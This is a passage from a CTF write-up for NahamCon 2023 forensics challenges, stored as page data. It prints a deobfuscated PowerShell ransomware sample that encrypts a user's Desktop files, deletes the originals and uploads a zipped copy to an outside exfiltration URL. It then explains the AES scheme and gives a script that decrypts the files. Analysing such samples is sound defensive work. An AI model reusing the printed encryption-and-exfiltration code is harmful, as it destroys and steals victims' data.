punctuation\">.</span>FullName <span class=\"token operator\">+</span> <span class=\"token string\">\".enc\"</span>\n<span class=\"token variable\">$FileStreamReader</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName<span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Open<span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$DestinationFile</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Create<span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$cipher</span> = <span class=\"token namespace\">[System.Security.Cryptography.SymmetricAlgorithm]</span>::Create<span class=\"token punctuation\">(</span><span class=\"token string\">\"AES\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>key = <span class=\"token namespace\">[System.Text.Encoding]</span>::UTF8<span class=\"token punctuation\">.</span>GetBytes<span class=\"token punctuation\">(</span><span class=\"token string\">\"7h3_k3y_70_unl0ck_4ll_7h3_f1l35!\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>Padding = <span class=\"token namespace\">[System.Security.Cryptography.PaddingMode]</span>::PKCS7\n<span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>GenerateIV<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span><span class=\"token function\">Write</span><span class=\"token punctuation\">(</span><span class=\"token namespace\">[System.BitConverter]</span>::GetBytes<span class=\"token punctuation\">(</span><span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV<span class=\"token punctuation\">.</span>Length<span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> 4<span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span><span class=\"token function\">Write</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV<span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV<span class=\"token punctuation\">.</span>Length<span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$Transform</span> = <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>CreateEncryptor<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$CryptoStream</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>Security<span class=\"token punctuation\">.</span>Cryptography<span class=\"token punctuation\">.</span>CryptoStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$Transform</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.Security.Cryptography.CryptoStreamMode]</span>::<span class=\"token function\">Write</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>CopyTo<span class=\"token punctuation\">(</span><span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>FlushFinalBlock<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">Remove-Item</span> <span class=\"token operator\">-</span>LiteralPath <span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span>\n\n<span class=\"token variable\">$flag</span> = <span class=\"token string\">\"flag{892a8921517dcecf90685d478aedf5e2}\"</span>\n<span class=\"token variable\">$ErrorActionPreference</span>= <span class=\"token string\">'silentlycontinue'</span>\n<span class=\"token variable\">$user</span> = <span class=\"token namespace\">[System.Security.Principal.WindowsIdentity]</span>::GetCurrent<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>Name<span class=\"token punctuation\">.</span>Split<span class=\"token punctuation\">(</span><span class=\"token string\">\"\\\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token operator\">-</span>1<span class=\"token punctuation\">]</span>\nencryptFiles<span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Desktop\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token function\">Add-Type</span> <span class=\"token operator\">-</span>assembly <span class=\"token string\">\"system.io.compression.filesystem\"</span>\n<span class=\"token namespace\">[io.compression.zipfile]</span>::CreateFromDirectory<span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Desktop\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Downloads\\Desktop.zip\"</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$zipFileBytes</span> = <span class=\"token function\">Get-Content</span> <span class=\"token operator\">-</span>Path <span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Downloads\\Desktop.zip\"</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">-</span>Raw <span class=\"token operator\">-</span>Encoding Byte\n<span class=\"token variable\">$zipFileData</span> = <span class=\"token namespace\">[Convert]</span>::ToBase64String<span class=\"token punctuation\">(</span><span class=\"token variable\">$zipFileBytes</span><span class=\"token punctuation\">)</span>\n<span class=\"token variable\">$body</span> = <span class=\"token function\">ConvertTo-Json</span> <span class=\"token operator\">-</span>InputObject @<span class=\"token punctuation\">{</span>file=<span class=\"token variable\">$zipFileData</span><span class=\"token punctuation\">}</span>\n<span class=\"token function\">Invoke-Webrequest</span> <span class=\"token operator\">-</span>Method Post <span class=\"token operator\">-</span>Uri <span class=\"token string\">\"https://www.thepowershellhacker.com/exfiltration\"</span> <span class=\"token operator\">-</span>Body <span class=\"token variable\">$body</span>\n<span class=\"token function\">Remove-Item</span> <span class=\"token operator\">-</span>LiteralPath <span class=\"token punctuation\">(</span><span class=\"token string\">\"C:\\Users\\\"</span><span class=\"token operator\">+</span><span class=\"token variable\">$user</span><span class=\"token operator\">+</span><span class=\"token string\">\"\\Downloads\\Desktop.zip\"</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>The Flag hardcoded in plaintext in this script is the third Flag.</p>\n<h3 id=\"ir4\" style=\"position:relative;\"><a href=\"#ir4\" aria-label=\"ir4 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR4</h3>\n<blockquote>\n<p>Where is the data being exfiltrated? Please give the MD5 hash of the URL with the usual wrapper of flag{}.</p>\n</blockquote>\n<p>Looking at the deobfuscated script from the previous step, the malware exfiltrates data to <code class=\"language-text\">https://www[.]thepowershellhacker[.]com/exfiltration</code>.</p>\n<p>The MD5 hash of that URL, wrapped in <code class=\"language-text\">flag{}</code>, is the fourth Flag.</p>\n<h3 id=\"ir5\" style=\"position:relative;\"><a href=\"#ir5\" aria-label=\"ir5 permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>IR5</h3>\n<blockquote>\n<p>Can you please recover our files?</p>\n</blockquote>\n<p>Reading the deobfuscated malware script shows that <code class=\"language-text\">encryptFiles</code> encrypts all files on the Desktop.</p>\n<p>Looking more closely, it uses AES in CBC mode with the key <code class=\"language-text\">7h3_k3y_70_unl0ck_4ll_7h3_f1l35!</code>.</p>\n<p>PKCS7 is the padding scheme used to pad plaintext to a multiple of the 16-byte AES block size.</p>\n<p>The encryption process uses the above key and a randomly generated IV, and prepends the IV’s size (4 bytes) followed by the IV bytes themselves to each encrypted file.</p>\n<p>Therefore, we can recover each file by extracting its IV from the beginning of the encrypted file and decrypting with AES-CBC using the known key.</p>\n<p>The following script was used for decryption:</p>\n<div class=\"gatsby-highlight\" data-language=\"powershell\"><pre class=\"language-powershell\"><code class=\"language-powershell\"><span class=\"token variable\">$baseDirectory</span> = <span class=\"token string\">\"E:\\Users\\IEUser\\Desktop\"</span>\n\n<span class=\"token keyword\">foreach</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span> in <span class=\"token punctuation\">(</span><span class=\"token function\">Get-ChildItem</span> <span class=\"token variable\">$baseDirectory</span> <span class=\"token operator\">-</span>Recurse <span class=\"token operator\">-</span>File<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>extension <span class=\"token operator\">-eq</span> <span class=\"token string\">\".enc\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">{</span>\n        <span class=\"token variable\">$SourceFile</span> = <span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName\n        <span class=\"token variable\">$DestinationFile</span> = <span class=\"token variable\">$File</span><span class=\"token punctuation\">.</span>FullName<span class=\"token punctuation\">.</span>Replace<span class=\"token punctuation\">(</span><span class=\"token string\">\".enc\"</span><span class=\"token punctuation\">,</span><span class=\"token string\">\"\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$DestinationFile</span>\n\n        <span class=\"token variable\">$FileStreamReader</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$SourceFile</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Open<span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamWriter</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>IO<span class=\"token punctuation\">.</span>FileStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$DestinationFile</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.IO.FileMode]</span>::Create<span class=\"token punctuation\">)</span>\n\n        <span class=\"token variable\">$cipher</span> = <span class=\"token namespace\">[System.Security.Cryptography.SymmetricAlgorithm]</span>::Create<span class=\"token punctuation\">(</span><span class=\"token string\">\"AES\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>key = <span class=\"token namespace\">[System.Text.Encoding]</span>::UTF8<span class=\"token punctuation\">.</span>GetBytes<span class=\"token punctuation\">(</span><span class=\"token string\">\"7h3_k3y_70_unl0ck_4ll_7h3_f1l35!\"</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>Padding = <span class=\"token namespace\">[System.Security.Cryptography.PaddingMode]</span>::PKCS7\n\n        <span class=\"token variable\">$IVLengthBuffer</span> = <span class=\"token function\">New-Object</span> Byte<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> 4\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Read<span class=\"token punctuation\">(</span><span class=\"token variable\">$IVLengthBuffer</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> 4<span class=\"token punctuation\">)</span>\n\n        <span class=\"token variable\">$IVLength</span> = <span class=\"token namespace\">[System.BitConverter]</span>::ToInt32<span class=\"token punctuation\">(</span><span class=\"token variable\">$IVLengthBuffer</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$IVBuffer</span> = <span class=\"token function\">New-Object</span> Byte<span class=\"token punctuation\">[</span><span class=\"token punctuation\">]</span> <span class=\"token variable\">$IVLength</span>\n\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Read<span class=\"token punctuation\">(</span><span class=\"token variable\">$IVBuffer</span><span class=\"token punctuation\">,</span> 0<span class=\"token punctuation\">,</span> <span class=\"token variable\">$IVLength</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>IV = <span class=\"token variable\">$IVBuffer</span>\n\n        <span class=\"token variable\">$Transform</span> = <span class=\"token variable\">$cipher</span><span class=\"token punctuation\">.</span>CreateDecryptor<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$CryptoStream</span> = <span class=\"token function\">New-Object</span> System<span class=\"token punctuation\">.</span>Security<span class=\"token punctuation\">.</span>Cryptography<span class=\"token punctuation\">.</span>CryptoStream<span class=\"token punctuation\">(</span><span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$Transform</span><span class=\"token punctuation\">,</span> <span class=\"token namespace\">[System.Security.Cryptography.CryptoStreamMode]</span>::<span class=\"token function\">Write</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>CopyTo<span class=\"token punctuation\">(</span><span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>FlushFinalBlock<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n\n        <span class=\"token variable\">$CryptoStream</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamReader</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n        <span class=\"token variable\">$FileStreamWriter</span><span class=\"token punctuation\">.</span>Close<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\n    <span class=\"token punctuation\">}</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>The IV size is stored in the first 4 bytes of each encrypted file; this was used to extract the IV and decrypt the files.</p>\n<p>Inspecting the recovered files, I found a file named <code class=\"language-text\">NexGen Innovations.pdf</code> with a small Flag printed in the lower-left corner.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 804px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/e7a75a21f673c6909ef9a94b27a6f382/27b7a/image-20230618172636319.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 48.33333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVQoz7VQ266EIBDj/79Po0a8gYoKrvq02Re7U3S/4HhIGgp0Oh2Ucw7DMKBtW4zjiHmeYYyB6TpYa+HcJOeLe+/Ry973feTUsWZd17hP0wSldYkiz9E0Deq6RpZlqKoKZSn3RRE579M0jY3JaZ7nGbTWUd9JczatxUPxkWbsxgJypmZHFhNM392JCeqSJJGkA3711BtjoULwWGRMxg0hYN93GeEV+bIsNzyO4xADG7/kEM31BQHbtsXxCQZReHip8zzxJP4r4XU4f+QvhrfVI2bR8P35PJrwC7cSAwHeG4AeAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/e7a75a21f673c6909ef9a94b27a6f382/8ac56/image-20230618172636319.webp 240w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/d3be9/image-20230618172636319.webp 480w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/95e88/image-20230618172636319.webp 804w\"\n              sizes=\"(max-width: 804px) 100vw, 804px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/e7a75a21f673c6909ef9a94b27a6f382/8ff5a/image-20230618172636319.png 240w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/e85cb/image-20230618172636319.png 480w,\n/static/e7a75a21f673c6909ef9a94b27a6f382/27b7a/image-20230618172636319.png 804w\"\n            sizes=\"(max-width: 804px) 100vw, 804px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/e7a75a21f673c6909ef9a94b27a6f382/27b7a/image-20230618172636319.png\"\n            alt=\"image-20230618172636319\"\n            title=\"image-20230618172636319\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"wrap-up\" style=\"position:relative;\"><a href=\"#wrap-up\" aria-label=\"wrap up permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Wrap-up</h2>\n<p>The Rev challenges this time were inexplicably hard and I couldn’t solve any of them.</p>\n<p>Rev has felt stagnant lately — I want to get to the point where I can tackle higher-difficulty problems.</p>","fields":{"slug":"/ctf-nahamCon-2023-en","tagSlugs":["/tag/ctf-en/","/tag/forensic-en/","/tag/english/"]},"frontmatter":{"date":"2023-06-18","description":"NahamCon 2023 CTF Writeup.","tags":["CTF (en)","Forensic (en)","English"],"title":"NahamCon 2023 Writeup","socialImage":{"publicURL":"/static/d143969d6f461311b81cdc93a5e43789/ctf-nahamCon-2023.png"}}}},"pageContext":{"slug":"/ctf-nahamCon-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}